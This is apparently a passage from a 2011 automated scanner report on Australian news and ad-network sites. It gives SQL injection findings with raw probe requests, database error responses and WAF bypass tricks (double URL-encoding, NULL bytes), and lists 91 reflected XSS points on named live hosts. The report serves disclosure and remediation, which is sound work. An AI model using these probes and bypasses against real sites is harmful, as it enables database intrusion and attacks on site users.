XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://data.weatherzone.com.au/json/animator/ [df parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://data.weatherzone.com.au
Path:	/json/animator/

Issue detail

The df parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the df parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z'&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 2457
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:20 GMT
Date: Wed, 07 Sep 2011 14:17:10 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>org.apache.jasper.JasperException: java.lang.IllegalArgumentException: Unterminated quote
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:522)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.20 logs.</u>
...[SNIP]...

Request 2

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z''&frames=4&callback=cbrad070 HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1101
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:21 GMT
Date: Wed, 07 Sep 2011 14:17:11 GMT
Connection: close
Vary: Accept-Encoding

cbrad070({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "ti
...[SNIP]...

1.2. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tools.ntnews.com.au
Path:	//admin/gallery_images/remote/2011/02/06/tn_165705.jpg

Issue detail

Request 1

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:14 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n14), ms lax-agg-n14 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:14 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

Request 2

GET //admin/gallery_images/remote/2011/02/06/tn_165705.jpg'' HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:16 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/02/06/tn_165705.jpg''
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.3. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tools.ntnews.com.au
Path:	//admin/gallery_images/remote/2011/07/13/tn_197121.jpg

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n54), ms lax-agg-n54 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:20 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

Request 2

GET //admin/gallery_images/remote/2011/07/13/tn_197121.jpg%2527%2527 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Sep 2011 14:18:21 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 413
Content-Type: text/html
Location: http://www.ntnews.com.au/images/gallery/remote/2011/07/13/tn_197121.jpg%27%27
Connection: keep-alive

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

1.4. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php [category_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/photo-gallery/photo_galleries_js.php

Issue detail

The category_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the category_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351'&title=Photo%20Galleries HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:46 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n51), ms lax-agg-n51 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:21:47 GMT
Age: 0
Content-Length: 240
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_All_Photo_Categorys: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND ec.active = 'Y' GROUP BY ec.category_id ORDER BY displayorder' at line 9

1.5. http://tools.themercury.com.au/admin/gallery_images/remote/2011/09/06/345781.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tools.themercury.com.au
Path:	/admin/gallery_images/remote/2011/09/06/345781.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /admin'/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Wed, 07 Sep 2011 14:19:01 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n18), ms lax-agg-n18 ( origin>CONN)
Retry-After: 0
Cache-Control: no-cache
Content-Length: 321
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailabl
...[SNIP]...
<h1>Error 503 Service Unavailable</h1>
...[SNIP]...

Request 2

GET /admin''/gallery_images/remote/2011/09/06/345781.jpg HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:19:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n37), ms lax-agg-n37 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.6. http://tools.themercury.com.au/feeds/feed-with-lead.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

Request 1

GET /feeds'/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:17 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n53), ms lax-agg-n53 ( origin>CONN backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:18 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

Request 2

GET /feeds''/feed-with-lead.php?category_id=55&range=0to6&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:18:19 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

1.7. http://tools.themercury.com.au/feeds/feed-with-lead.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00'=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n46), ms lax-agg-n46 ( origin>CONN backup-origin)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:20:19 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

Request 2

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news&1801&1%00''=1 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n42), ms lax-agg-n42 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:21 GMT
Age: 0
Content-Length: 1482
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news.php" ><img src="http://res
...[SNIP]...

1.8. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/yoursay/yoursay-single-extract.php

Issue detail

The range parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the range parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /yoursay/yoursay-single-extract.php?range=0to1' HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:53 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n17), ms lax-agg-n17 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:54 GMT
Age: 0
Content-Length: 167
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3

2. Cross-site scripting (reflected) previous next
There are 91 instances of this issue:

http://ad.agkn.com/iframe!t=1131! [clk1 parameter]
http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]
http://ad.agkn.com/iframe!t=1131! [mt_id parameter]
http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]
http://ad.agkn.com/iframe!t=1131! [redirect parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.turn.com/server/pixel.htm [sp parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://adnxs.revsci.net/imp [Z parameter]
http://adnxs.revsci.net/imp [s parameter]
http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]
http://ads.adbrite.com/adserver/vdi/830697 [r parameter]
http://adsfac.us/ag.asp [cc parameter]
http://api-public.addthis.com/url/shares.json [callback parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://data.weatherzone.com.au/json/animator/ [callback parameter]
http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1]
http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter]
http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]
http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter]
http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1]
http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2]
http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1]
http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2]
http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1]
http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2]
http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]
http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]
http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]
http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter]
http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter]
http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter]
http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter]
http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter]
http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter]
http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]
http://tps30.doubleverify.com/visit.js [plc parameter]
http://tps30.doubleverify.com/visit.js [sid parameter]
http://web.adblade.com/imps.php [description_color parameter]
http://web.adblade.com/imps.php [name of an arbitrarily supplied request parameter]
http://web.adblade.com/imps.php [title_color parameter]
http://web.adblade.com/imps.php [tpUrl parameter]
http://webservice.theweather.com.au/ws1/wx.php [fc parameter]
http://www.7perth.com.au/javascript.js [a parameter]
http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter]
http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter]
http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter]
http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter]
http://www.linkedin.com/countserv/count/share [url parameter]
http://adnxs.revsci.net/imp [Referer HTTP header]
http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]
http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://ad.agkn.com/iframe!t=1131! [clk1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

